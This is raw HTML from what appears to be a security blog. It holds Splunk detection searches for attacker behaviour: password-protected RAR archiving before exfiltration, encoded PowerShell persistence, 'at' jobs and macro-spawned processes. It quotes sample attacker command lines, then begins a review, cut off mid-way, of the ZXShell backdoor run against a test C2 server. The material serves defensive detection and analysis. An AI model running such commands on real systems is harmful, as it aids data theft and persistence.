<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Command="a.exe a -hpqwerty123 data1.rar supersecret.doc", ProcessId="0x11c", ProcessName="cmd", Type="Added", User="WIN-1UJAK6S06VK\testuser", WLSKey="122"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some attackers use the “makecab.exe” for compressing data before exfil. It’s on all windows systems and not many people use it so alerting on its execution might be a good idea. </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Other APT groups are also using powershell as a method for persistence as indicated by this FireEye </span><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">article</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Using the same method above we create a scheduled Splunk search on the “-enc” parameter passed to powershell.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example attacker activity from </span><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example Splunk alert</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"> index=main WLS_CommandMonitor Command=”powershell –NonInteractive –enc *”</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The other popular method of persistence is by scheduling “at” jobs. Since this data is logged and not too many people use this, results should be low:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor: LogType="WLS", Command="at *” </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Or you could alert on the execution of “at.exe”:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) BaseFileName=”at.exe”</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Malicious Microsoft Office Documents</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Word documents embedded with malicious macros to download & execute malware is still common. WLS logs the creator process name so it’s pretty simple to search for any event where Microsoft Word creates a new process:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) CreatorProcessName=WINWORD </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For Excel, Powerpoint or Access you would just substitute the appropriate “CreatorProcessName”. </span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Entropy</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In many cases attackers use packed binaries which result in high entropy. While this is not a candidate for an alert it can certainly be used for malware hunting. An example from WLS event would report it as </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Entropy="4.61108706992542". </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In splunk you could search for unsigned binaries executed with entropy greater than 7:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) Signed=False Entropy>=7</span></div>
<b style="font-weight: normal;"><br /><br /><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I will be updating this post with additional searches when time allows. Hopefully this information is helpful, if you have any questions or comments hit me up on twitter.</span></div>
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-13405030849607077342014-02-18T19:24:00.000-08:002014-02-18T19:24:52.044-08:00Review of ZXShell Used in US Veterans of Foreign Wars Compromise<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="color: black; font-family: Calibri; font-size: 13.5pt; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;">FireEye recently <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">posted
a blog article</a> on the compromise of US Veterans of Foreign Wars website, <a href="http://www.symantec.com/connect/blogs/new-internet-explorer-10-zero-day-discovered-watering-hole-attack" target="_blank">Symantec also has one</a>. I've played with ZXShell in the past and was curious if I could get the </span><span style="font-family: Calibri; font-size: 13.5pt;">DeputyDog/</span><span style="font-family: Calibri; font-size: medium;">Hidden Lynx</span><span style="font-family: Calibri; font-size: 13.5pt;"> actors</span><span style="font-family: Calibri; font-size: 13.5pt;"> ZXShell payload working with my command and control server</span><span style="font-family: Calibri; font-size: medium;">. Turns out you can and I was able to make some interesting comparisons between the client I tested and the <a href="https://www.virustotal.com/en/file/3d362ba0c4bc06b69a3a908bc62a50a2a673c10060f4b9268b8641536b43c5ac/analysis/" target="_blank">vfw dropper</a>.</span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="color: black; font-family: Calibri; font-size: 13.5pt; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;"><br /></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Calibri; font-size: medium;">The agent below is the <a href="http://www.xfocus.net/tools/200706/1248.html" target="_blank">publicly available client</a> and the options available to run on the compromised host (translated descriptions are at the end of this blog).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_ikXYW3X3uQ/UwQRwcwNUhI/AAAAAAAAFek/sdjyML6xt_4/s1600/zxshell+commands+3.10.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_ikXYW3X3uQ/UwQRwcwNUhI/AAAAAAAAFek/sdjyML6xt_4/s1600/zxshell+commands+3.10.tiff" height="348" width="640" /></a></div>
<br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--><br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
<span style="font-family: Calibri; font-size: medium;">This screenshot is the dropper used in the VFW.org attack connecting to my command and control server (modified the host file and spoofed dns replies with Mandiant's ApateDNS).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eSA250JaLIQ/UwQSzsD-dgI/AAAAAAAAFes/E-knButJElw/s1600/ZXShell+3.20+commands.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-eSA250JaLIQ/UwQSzsD-dgI/AAAAAAAAFes/E-knButJElw/s1600/ZXShell+3.20+commands.tiff" height="238" width="640" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">First thing I noticed was the lack of commands, despite being a newer version (assuming the 3.10 and 3.20 are client versions). Also the descriptions have all been changed to English, which is a bit odd if English isn't your first language. Speaking of odd, I was wondering about this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
